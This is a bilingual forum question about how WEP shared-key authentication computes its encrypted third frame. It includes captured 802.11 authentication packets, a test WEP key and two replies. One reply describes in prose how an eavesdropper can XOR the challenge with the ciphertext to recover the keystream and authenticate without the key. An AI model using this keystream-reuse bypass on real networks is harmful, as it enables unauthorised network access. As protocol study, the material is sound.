什么是 WEP 共享密钥认证算法
最近我在读一本名为《802.11无线网络权威指南(第二版)》的书。我发现自己无法理解 WEP 共享密钥身份验证的算法。
在本书第 8.3 章“共享密钥身份验证的遗产”部分中,它说
第三帧是移动站对挑战的响应。为了证明它在网络上是允许的,移动站构建具有三个信息元素的管理帧:认证算法标识符、序列号3和质询文本。在发送帧之前,移动站使用 WEP(但是如何???)处理该帧。将帧标识为身份验证帧的标头被保留,但信息元素被 WEP 隐藏。
所以想请教一下这里的好心社区。
以下是我使用 Tamosoft Commview for wifi 6.3 捕获的 WEP 身份验证会话数据包示例。
- AP MAC:000E.2E7C.52A9 (Edimax)
- Wifi 客户端:0020.4A96.23C7 (Lantronix WiPort)
- WEP 密钥为 437B7A57F6762CC7271EBB16FC
您可以在此处找到我的数据包捕获:http://down.nlscan.com/misc/WEP128-shared-key-success-1.ncf
数据包 #55 ,#57,#59,#61是WEP认证报文。 #59 是“第三帧”。
============================================================================
Packet #55, Direction: Pass-through, Time:16:11:42.634285, Size: 30
Wireless Packet Info
Signal level: 100%
Rate: 2.0 Mbps
Band: 802.11g
Channel: 11 - 2462 MHz
802.11
Frame Control: 0x00B0 (176)
Protocol version: 0
To DS: 0
From DS: 0
More Fragments: 0
Retry: 0
Power Management: 0
More Data: 0
Protected Frame: 0
Order: 0
Type: 0 - Management
Subtype: 11 - Authentication
Duration: 0x0102 (258)
Destination Address: 00:0E:2E:7C:52:A9
Source Address: 00:20:4A:96:23:C7
BSS ID: 00:0E:2E:7C:52:A9
Fragment Number: 0x0000 (0)
Sequence Number: 0x000E (14)
Authentication
Algorithm Number: 0x0001 (1) - Shared Key
Transaction Sequence Number: 0x0001 (1)
Status Code: 0x0000 (0) - Successful
Raw Data:
0x0000 B0 00 02 01 00 0E 2E 7C-52 A9 00 20 4A 96 23 C7 °......|R©. J–#Ç
0x0010 00 0E 2E 7C 52 A9 E0 00-01 00 01 00 00 00 ...|R©à.......
============================================================================
Packet #57, Direction: Pass-through, Time:16:11:42.638429, Size: 160
Wireless Packet Info
Signal level: 100%
Rate: 1.0 Mbps
Band: 802.11g
Channel: 11 - 2462 MHz
802.11
Frame Control: 0x00B0 (176)
Protocol version: 0
To DS: 0
From DS: 0
More Fragments: 0
Retry: 0
Power Management: 0
More Data: 0
Protected Frame: 0
Order: 0
Type: 0 - Management
Subtype: 11 - Authentication
Duration: 0x013A (314)
Destination Address: 00:20:4A:96:23:C7
Source Address: 00:0E:2E:7C:52:A9
BSS ID: 00:0E:2E:7C:52:A9
Fragment Number: 0x0000 (0)
Sequence Number: 0x0343 (835)
Authentication
Algorithm Number: 0x0001 (1) - Shared Key
Transaction Sequence Number: 0x0002 (2)
Status Code: 0x0000 (0) - Successful
Challenge text: 28 B8 9B EC 79 C1 AC B6 24 AD 54 A5 5A 96 EE 24 3E 25 F2 D5 B8 11 1C 2F E9 8D 2B A2 63 EA 3D 1F 40 6E 8C 3D 2C 7E 37 E9 5C 9C F4 0E F2 9C 50 88 21 DA 35 09 97 AE E3 BA 4E 56 77 9A B4 B1 F2 34 E9 AD
Raw Data:
0x0000 B0 00 3A 01 00 20 4A 96-23 C7 00 0E 2E 7C 52 A9 °.:.. J–#Ç...|R©
0x0010 00 0E 2E 7C 52 A9 30 34-01 00 02 00 00 00 10 80 ...|R©04.......€
0x0020 28 B8 9B EC 79 C1 AC B6-24 AD 54 A5 5A 96 EE 24 (¸›ìyÁ¬¶$T¥Z–î$
0x0030 3E 25 F2 D5 B8 11 1C 2F-E9 8D 2B A2 63 EA 3D 1F >%òÕ¸../é+¢cê=.
0x0040 40 6E 8C 3D 2C 7E 37 E9-5C 9C F4 0E F2 9C 50 88 @nŒ=,~7é\œô.òœPˆ
0x0050 21 DA 35 09 97 AE E3 BA-4E 56 77 9A B4 B1 F2 34 !Ú5.—®ãºNVwš´±ò4
0x0060 E9 AD 8D 98 05 28 A1 AD-3F DA 66 05 60 66 EA 24 é˜.(¡?Úf.`fê$
0x0070 02 DA 14 AC 66 CD DC E6-93 A8 79 23 70 87 39 44 .Ú.¬fÍÜ擨y#p‡9D
0x0080 17 4E 0F AC A2 CA 9F 84-5F 94 66 3C 04 AB 86 8E .N.¬¢ÊŸ„_”f<.«†Ž
0x0090 99 78 AB C9 E9 C0 91 95-9E 52 B1 7C 6B 22 63 C0 ™x«ÉéÀ‘•žR±|k"cÀ
============================================================================
Packet #59, Direction: Pass-through, Time:16:11:42.639825, Size: 168
Wireless Packet Info
Signal level: 100%
Rate: 2.0 Mbps
Band: 802.11g
Channel: 11 - 2462 MHz
802.11
Frame Control: 0x40B0 (16560)
Protocol version: 0
To DS: 0
From DS: 0
More Fragments: 0
Retry: 0
Power Management: 0
More Data: 0
Protected Frame: 1
Order: 0
Type: 0 - Management
Subtype: 11 - Authentication
Duration: 0x0102 (258)
Destination Address: 00:0E:2E:7C:52:A9
Source Address: 00:20:4A:96:23:C7
BSS ID: 00:0E:2E:7C:52:A9
Fragment Number: 0x0000 (0)
Sequence Number: 0x000F (15)
Authentication
Algorithm Number: 0x1300 (4864) - Reserved
Transaction Sequence Number: 0x00F6 (246)
Status Code: 0xB4BA (46266) - Reserved
Raw Data:
0x0000 B0 40 02 01 00 0E 2E 7C-52 A9 00 20 4A 96 23 C7 °@.....|R©. J–#Ç
0x0010 00 0E 2E 7C 52 A9 F0 00-00 13 F6 00 BA B4 A9 F5 ...|R©ð...ö.º´©õ
0x0020 77 E9 5D 1F A2 B2 CE 3A-AD 1E FD 31 EA 55 90 B8 wé].¢²Î:.ý1êU¸
0x0030 56 F6 EF 81 CE C5 95 B6-9B 2F C4 77 BD E0 DD 73 VöïÎÅ•¶›/Äw½àÝs
0x0040 C6 C8 CE F6 0B 3F 0E 8D-08 15 93 5C 26 6E DA 17 ÆÈÎö.?...“\&nÚ.
0x0050 83 34 A2 53 51 65 3C AE-7A 5C A5 EA 04 97 6E F0 ƒ4¢SQe<®z\¥ê.—nð
0x0060 53 02 02 91 08 51 87 8E-83 38 CD 23 35 E7 56 1B S..‘.Q‡Žƒ8Í#5çV.
0x0070 1D A8 52 8F E1 D4 21 FD-46 41 65 AD 26 AB 74 3D .¨RáÔ!ýFAe&«t=
0x0080 E0 13 12 66 F5 C1 67 B3-71 7F 83 77 A0 34 16 55 à..fõÁg³qƒw 4.U
0x0090 25 96 31 01 A0 9C D9 13-1E 7C E6 8F 15 8D 8A 7B %–1. œÙ..|æ.Š{
0x00A0 8E 6B 65 97 74 0B 23 71- Žke—t.#q
============================================================================
Packet #61, Direction: Pass-through, Time:16:11:42.640916, Size: 30
Wireless Packet Info
Signal level: 100%
Rate: 1.0 Mbps
Band: 802.11g
Channel: 11 - 2462 MHz
802.11
Frame Control: 0x00B0 (176)
Protocol version: 0
To DS: 0
From DS: 0
More Fragments: 0
Retry: 0
Power Management: 0
More Data: 0
Protected Frame: 0
Order: 0
Type: 0 - Management
Subtype: 11 - Authentication
Duration: 0x013A (314)
Destination Address: 00:20:4A:96:23:C7
Source Address: 00:0E:2E:7C:52:A9
BSS ID: 00:0E:2E:7C:52:A9
Fragment Number: 0x0000 (0)
Sequence Number: 0x0344 (836)
Authentication
Algorithm Number: 0x0001 (1) - Shared Key
Transaction Sequence Number: 0x0004 (4)
Status Code: 0x0000 (0) - Successful
Raw Data:
0x0000 B0 00 3A 01 00 20 4A 96-23 C7 00 0E 2E 7C 52 A9 °.:.. J–#Ç...|R©
0x0010 00 0E 2E 7C 52 A9 40 34-01 00 04 00 00 00 ...|R©@4......
============================================================================
我从书中知道了 RC4 的工作原理,并且我编写了一个 python 程序来验证 WEP 如何加密 802.11 数据包。
剩下的问题是我无法弄清楚 WEP 身份验证算法是如何工作的(#59 是如何计算的。
等待您的慷慨帮助。
I'm reading a book named 802.11 Wireless Networks The Definitive Guide(second edition) recently. I find myself unable to understand the algorithm of WEP shared-key authentication.
In the book, chapter 8.3, section "The legacy of shared-key authentication", it says
The third frame is the mobile station's response to the challenge. To prove that it is allowed on the network, the mobile station constructs a management frame with three information elements: the Authentication Algorithm Identifier, a Sequence Number of 3, and the Challenge Text. Before transmitting the frame, the mobile station processes the frame with WEP (BUT HOW???). The header identifying the frame as an authentication frame is preserved, but the information elements are hidden by WEP.
So, I'd like to ask the kind community here.
Here is my example WEP auth session packets captured with Tamosoft Commview for wifi 6.3.
- AP MAC: 000E.2E7C.52A9 (Edimax)
- Wifi client: 0020.4A96.23C7 (Lantronix WiPort)
- WEP key is 437B7A57F6762CC7271EBB16FC
You can find my packet capture here: http://down.nlscan.com/misc/WEP128-shared-key-success-1.ncf
Packet #55,#57,#59,#61 is the WEP authentication packets. #59 is "the third frame".
============================================================================
Packet #55, Direction: Pass-through, Time:16:11:42.634285, Size: 30
Wireless Packet Info
Signal level: 100%
Rate: 2.0 Mbps
Band: 802.11g
Channel: 11 - 2462 MHz
802.11
Frame Control: 0x00B0 (176)
Protocol version: 0
To DS: 0
From DS: 0
More Fragments: 0
Retry: 0
Power Management: 0
More Data: 0
Protected Frame: 0
Order: 0
Type: 0 - Management
Subtype: 11 - Authentication
Duration: 0x0102 (258)
Destination Address: 00:0E:2E:7C:52:A9
Source Address: 00:20:4A:96:23:C7
BSS ID: 00:0E:2E:7C:52:A9
Fragment Number: 0x0000 (0)
Sequence Number: 0x000E (14)
Authentication
Algorithm Number: 0x0001 (1) - Shared Key
Transaction Sequence Number: 0x0001 (1)
Status Code: 0x0000 (0) - Successful
Raw Data:
0x0000 B0 00 02 01 00 0E 2E 7C-52 A9 00 20 4A 96 23 C7 °......|R©. J–#Ç
0x0010 00 0E 2E 7C 52 A9 E0 00-01 00 01 00 00 00 ...|R©à.......
============================================================================
Packet #57, Direction: Pass-through, Time:16:11:42.638429, Size: 160
Wireless Packet Info
Signal level: 100%
Rate: 1.0 Mbps
Band: 802.11g
Channel: 11 - 2462 MHz
802.11
Frame Control: 0x00B0 (176)
Protocol version: 0
To DS: 0
From DS: 0
More Fragments: 0
Retry: 0
Power Management: 0
More Data: 0
Protected Frame: 0
Order: 0
Type: 0 - Management
Subtype: 11 - Authentication
Duration: 0x013A (314)
Destination Address: 00:20:4A:96:23:C7
Source Address: 00:0E:2E:7C:52:A9
BSS ID: 00:0E:2E:7C:52:A9
Fragment Number: 0x0000 (0)
Sequence Number: 0x0343 (835)
Authentication
Algorithm Number: 0x0001 (1) - Shared Key
Transaction Sequence Number: 0x0002 (2)
Status Code: 0x0000 (0) - Successful
Challenge text: 28 B8 9B EC 79 C1 AC B6 24 AD 54 A5 5A 96 EE 24 3E 25 F2 D5 B8 11 1C 2F E9 8D 2B A2 63 EA 3D 1F 40 6E 8C 3D 2C 7E 37 E9 5C 9C F4 0E F2 9C 50 88 21 DA 35 09 97 AE E3 BA 4E 56 77 9A B4 B1 F2 34 E9 AD
Raw Data:
0x0000 B0 00 3A 01 00 20 4A 96-23 C7 00 0E 2E 7C 52 A9 °.:.. J–#Ç...|R©
0x0010 00 0E 2E 7C 52 A9 30 34-01 00 02 00 00 00 10 80 ...|R©04.......€
0x0020 28 B8 9B EC 79 C1 AC B6-24 AD 54 A5 5A 96 EE 24 (¸›ìyÁ¬¶$T¥Z–î$
0x0030 3E 25 F2 D5 B8 11 1C 2F-E9 8D 2B A2 63 EA 3D 1F >%òÕ¸../é+¢cê=.
0x0040 40 6E 8C 3D 2C 7E 37 E9-5C 9C F4 0E F2 9C 50 88 @nŒ=,~7é\œô.òœPˆ
0x0050 21 DA 35 09 97 AE E3 BA-4E 56 77 9A B4 B1 F2 34 !Ú5.—®ãºNVwš´±ò4
0x0060 E9 AD 8D 98 05 28 A1 AD-3F DA 66 05 60 66 EA 24 é˜.(¡?Úf.`fê$
0x0070 02 DA 14 AC 66 CD DC E6-93 A8 79 23 70 87 39 44 .Ú.¬fÍÜ擨y#p‡9D
0x0080 17 4E 0F AC A2 CA 9F 84-5F 94 66 3C 04 AB 86 8E .N.¬¢ÊŸ„_”f<.«†Ž
0x0090 99 78 AB C9 E9 C0 91 95-9E 52 B1 7C 6B 22 63 C0 ™x«ÉéÀ‘•žR±|k"cÀ
============================================================================
Packet #59, Direction: Pass-through, Time:16:11:42.639825, Size: 168
Wireless Packet Info
Signal level: 100%
Rate: 2.0 Mbps
Band: 802.11g
Channel: 11 - 2462 MHz
802.11
Frame Control: 0x40B0 (16560)
Protocol version: 0
To DS: 0
From DS: 0
More Fragments: 0
Retry: 0
Power Management: 0
More Data: 0
Protected Frame: 1
Order: 0
Type: 0 - Management
Subtype: 11 - Authentication
Duration: 0x0102 (258)
Destination Address: 00:0E:2E:7C:52:A9
Source Address: 00:20:4A:96:23:C7
BSS ID: 00:0E:2E:7C:52:A9
Fragment Number: 0x0000 (0)
Sequence Number: 0x000F (15)
Authentication
Algorithm Number: 0x1300 (4864) - Reserved
Transaction Sequence Number: 0x00F6 (246)
Status Code: 0xB4BA (46266) - Reserved
Raw Data:
0x0000 B0 40 02 01 00 0E 2E 7C-52 A9 00 20 4A 96 23 C7 °@.....|R©. J–#Ç
0x0010 00 0E 2E 7C 52 A9 F0 00-00 13 F6 00 BA B4 A9 F5 ...|R©ð...ö.º´©õ
0x0020 77 E9 5D 1F A2 B2 CE 3A-AD 1E FD 31 EA 55 90 B8 wé].¢²Î:.ý1êU¸
0x0030 56 F6 EF 81 CE C5 95 B6-9B 2F C4 77 BD E0 DD 73 VöïÎÅ•¶›/Äw½àÝs
0x0040 C6 C8 CE F6 0B 3F 0E 8D-08 15 93 5C 26 6E DA 17 ÆÈÎö.?...“\&nÚ.
0x0050 83 34 A2 53 51 65 3C AE-7A 5C A5 EA 04 97 6E F0 ƒ4¢SQe<®z\¥ê.—nð
0x0060 53 02 02 91 08 51 87 8E-83 38 CD 23 35 E7 56 1B S..‘.Q‡Žƒ8Í#5çV.
0x0070 1D A8 52 8F E1 D4 21 FD-46 41 65 AD 26 AB 74 3D .¨RáÔ!ýFAe&«t=
0x0080 E0 13 12 66 F5 C1 67 B3-71 7F 83 77 A0 34 16 55 à..fõÁg³qƒw 4.U
0x0090 25 96 31 01 A0 9C D9 13-1E 7C E6 8F 15 8D 8A 7B %–1. œÙ..|æ.Š{
0x00A0 8E 6B 65 97 74 0B 23 71- Žke—t.#q
============================================================================
Packet #61, Direction: Pass-through, Time:16:11:42.640916, Size: 30
Wireless Packet Info
Signal level: 100%
Rate: 1.0 Mbps
Band: 802.11g
Channel: 11 - 2462 MHz
802.11
Frame Control: 0x00B0 (176)
Protocol version: 0
To DS: 0
From DS: 0
More Fragments: 0
Retry: 0
Power Management: 0
More Data: 0
Protected Frame: 0
Order: 0
Type: 0 - Management
Subtype: 11 - Authentication
Duration: 0x013A (314)
Destination Address: 00:20:4A:96:23:C7
Source Address: 00:0E:2E:7C:52:A9
BSS ID: 00:0E:2E:7C:52:A9
Fragment Number: 0x0000 (0)
Sequence Number: 0x0344 (836)
Authentication
Algorithm Number: 0x0001 (1) - Shared Key
Transaction Sequence Number: 0x0004 (4)
Status Code: 0x0000 (0) - Successful
Raw Data:
0x0000 B0 00 3A 01 00 20 4A 96-23 C7 00 0E 2E 7C 52 A9 °.:.. J–#Ç...|R©
0x0010 00 0E 2E 7C 52 A9 40 34-01 00 04 00 00 00 ...|R©@4......
============================================================================
I know, from the book, how RC4 works and I have written a python program to verify how WEP encrypts a 802.11 packet.
The remaining issue is I just cannot figure out how WEP authentication algorithm works(how #59 is calculated.
Waiting for your generous help.
如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。
绑定邮箱获取回复消息
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
发布评论
评论(2)
我的推测是,当挑战以明文形式发送时,移动站会选择一个随机 IV 并使用预共享的 WEP 密钥,当 IV 用作密钥的前 3 个字节时,它会使用 RC4 加密挑战。这 3 个字节通过通道以明文形式发送。那么,问题就从这里开始,正如本书后面提到的。任何监听通信的人都可以窃听并找出挑战和密文,将两者进行异或,攻击者获得密钥流并要求新的挑战,并使用与合法用户相同的 IV 和相同的密钥流对其进行加密。然后他就可以简单地进行身份验证,尽管他仍然不知道 WEP 密钥:)
my speculation says that when the challenge is sent in cleartext, the mobile station picks a random IV and using the pre-shared WEP key, it encrypts the challenge using RC4 when IV is used as the first 3 bytes of the key. These 3 bytes are sent in clear over the channel. Then, the problem starts here as mentioned later in the book. Anyone who is listening to the communication, can eavesdrop and find out the challenge and the ciphertext, xoring these two, the attacker gets the keystream and asks for a new challenge and encrypts it with the same IV as the legitimate user and the same keystream. He can then simply authenticate, though he still does not know the WEP key :)
这是一个很好的问题,但是关于它们的规范和书籍在您最需要它们的地方通常是不完整的。
在这种情况下,工作源代码是您最好的选择,并且 linux/net/mac80211/wep.c 代码可供阅读。
This is a good question, but specifications and books written about them are often incomplete in the place where you need them the most.
Working source code is your best bet in this case and the linux/net/mac80211/wep.c code is out there for the reading.